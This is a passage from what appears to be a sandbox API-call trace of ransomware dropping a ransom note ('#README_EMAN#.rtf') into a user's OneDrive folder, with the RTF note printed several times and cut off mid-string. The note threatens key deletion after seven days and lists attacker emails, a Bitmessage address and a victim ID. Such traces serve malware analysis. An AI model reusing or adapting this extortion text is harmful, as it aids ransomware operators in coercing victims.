w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¡ñ¶zÎj¬¸úo²BR|\x9a\x9a^é°\x8fI\x8f(\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0300.138] WriteFile (in: hFile=0x2d4, lpBuffer=0x1ef8ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.140] CloseHandle (hObject=0x2d4) returned 1 [0300.140] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\zh-tw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\zh-tw\\#readme_eman#.rtf")) returned 0xffffffff [0300.140] GetLastError () returned 0x2 [0300.140] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\zh-tw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\zh-tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.154] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.154] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 